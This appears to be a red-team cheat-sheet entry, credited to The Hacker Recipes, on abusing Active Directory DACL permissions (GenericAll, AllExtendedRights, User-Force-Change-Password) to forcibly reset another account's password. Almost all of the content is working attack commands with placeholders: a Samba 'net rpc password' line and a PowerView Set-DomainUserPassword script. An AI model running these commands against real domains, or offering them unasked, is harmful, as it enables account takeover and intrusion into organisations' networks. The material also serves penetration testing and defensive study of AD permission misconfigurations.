PRIMARY CATEGORY → DACL ABUSE

This abuse can be carried out when an operator controls a principal which has GenericAll, AllExtendedRight or User-Force-Change-Password over the target account


Abuse - UNIX-like

Net RPC (Samba Suite)

Net RPC

net rpc password '<TARGET_ACCOUNT>' '<PASSWD>' -U '<DOMAIN>/<USER>%<PASSWD>' -S '<TARGET>'

Abuse - Windows

Powerview

Powerview

Set-DomainUserPassword

$principalPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
$principalCred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $principalPasswd)
$targetPasswd = ConvertTo-SecureString -AsPlainText -Force -String '<PASSWD>'
Set-DomainUserPassword -Credential $principalCred -Identity '<TARGET_ACCOUNT>' -AccountPassword $targetPasswd 

References

The Hacker Recipes